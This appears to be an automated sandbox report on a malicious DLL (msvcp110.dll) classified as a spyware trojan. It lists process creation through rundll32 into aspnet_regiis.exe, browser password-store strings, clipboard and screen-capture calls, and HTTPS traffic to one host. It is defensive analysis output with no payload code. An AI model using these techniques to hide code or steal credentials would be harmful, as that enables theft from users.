Source: aspnet_regiis.exe, 00000009.00000003.2131037044.0000000005257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: aspnet_regiis.exe, 00000005.00000003.2103906354.0000000005405000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2103522462.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2131037044.0000000005257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: aspnet_regiis.exe, 00000009.00000003.2131037044.0000000005257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: aspnet_regiis.exe, 00000005.00000003.2103906354.0000000005405000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2103522462.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2131037044.0000000005257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: aspnet_regiis.exe, 00000005.00000003.2103906354.0000000005405000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2103522462.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2131037044.0000000005257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49727 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 7_2_75AA6B70 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

7_2_75AA6B70

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 7_2_75AA6B70 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

7_2_75AA6B70

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 7_2_75AA6D70 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

7_2_75AA6D70

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 75A70000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 75A70000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 75A70000 page execute and read and write	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C3FF7F	5_3_02C3FF7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C3FF7F	5_3_02C3FF7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C3FF7F	5_3_02C3FF7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C3FF7F	5_3_02C3FF7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C3FF7F	5_3_02C3FF7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C3FF7F	5_3_02C3FF7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_3_028B5E9D	7_3_028B5E9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_3_028B5E9D	7_3_028B5E9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_3_028B5E9D	7_3_028B5E9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_3_028B5E9D	7_3_028B5E9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A7EC20	7_2_75A7EC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A80460	7_2_75A80460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A8D7F8	7_2_75A8D7F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A7F753	7_2_75A7F753
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A7E1A0	7_2_75A7E1A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A979B0	7_2_75A979B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A96022	7_2_75A96022
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A8104F	7_2_75A8104F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A9AB20	7_2_75A9AB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A7ADB0	7_2_75A7ADB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75AB3D90	7_2_75AB3D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75AB35F0	7_2_75AB35F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A865D7	7_2_75A865D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A92520	7_2_75A92520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A76D10	7_2_75A76D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A9A510	7_2_75A9A510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A9F570	7_2_75A9F570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A8ED48	7_2_75A8ED48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A7BD50	7_2_75A7BD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A9ECE0	7_2_75A9ECE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75AB24E0	7_2_75AB24E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A814CE	7_2_75A814CE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A8CC20	7_2_75A8CC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A78460	7_2_75A78460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75AB2FB0	7_2_75AB2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75AB378A	7_2_75AB378A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A79FF5	7_2_75A79FF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A7A720	7_2_75A7A720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75AB2700	7_2_75AB2700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A7DF60	7_2_75A7DF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A93770	7_2_75A93770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75AB3740	7_2_75AB3740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75AAAE90	7_2_75AAAE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A78EF0	7_2_75A78EF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A91EC5	7_2_75A91EC5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A83E45	7_2_75A83E45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A86997	7_2_75A86997
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A791E9	7_2_75A791E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75AB39C0	7_2_75AB39C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A73930	7_2_75A73930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A91100	7_2_75A91100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A9A112	7_2_75A9A112
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A96940	7_2_75A96940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A770B0	7_2_75A770B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A930E0	7_2_75A930E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75AAB0F0	7_2_75AAB0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A998F2	7_2_75A998F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A9702F	7_2_75A9702F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75AAF020	7_2_75AAF020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A8E837	7_2_75A8E837
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A75000	7_2_75A75000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75AAF800	7_2_75AAF800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A8D010	7_2_75A8D010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A8E07E	7_2_75A8E07E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75AB5040	7_2_75AB5040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75AA5050	7_2_75AA5050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A8FBA0	7_2_75A8FBA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A9C3A6	7_2_75A9C3A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A983E2	7_2_75A983E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A9CBD0	7_2_75A9CBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A9B3D0	7_2_75A9B3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A99328	7_2_75A99328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A7132D	7_2_75A7132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75AB5330	7_2_75AB5330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75AB2B10	7_2_75AB2B10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A77AB0	7_2_75A77AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A7DA80	7_2_75A7DA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75AB3A90	7_2_75AB3A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A712D5	7_2_75A712D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A7A260	7_2_75A7A260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A84A4C	7_2_75A84A4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A8FA4F	7_2_75A8FA4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 7_2_75A7B240	7_2_75A7B240

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 75A7E190 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 75A7C890 appears 54 times

Source: msvcp110.dll

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL

Source: classification engine

Classification label: mal100.troj.spyw.evad.winDLL@16/0@1/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 7_2_75AABB70 CoCreateInstance,

7_2_75AABB70

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4768:120:WilError_03

Source: msvcp110.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\msvcp110.dll,GetGameData

Source: aspnet_regiis.exe, 00000005.00000003.2074642873.0000000005108000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2088636928.00000000050E9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074892888.00000000050EB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2088634540.0000000004E89000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074501421.0000000004E88000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2101834264.0000000004F59000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102185643.0000000004F3A000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: msvcp110.dll

ReversingLabs: Detection: 63%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\msvcp110.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\msvcp110.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\msvcp110.dll,GetGameData
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\msvcp110.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\msvcp110.dll",GetGameData
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\msvcp110.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\msvcp110.dll,GetGameData	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\msvcp110.dll",GetGameData	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\msvcp110.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
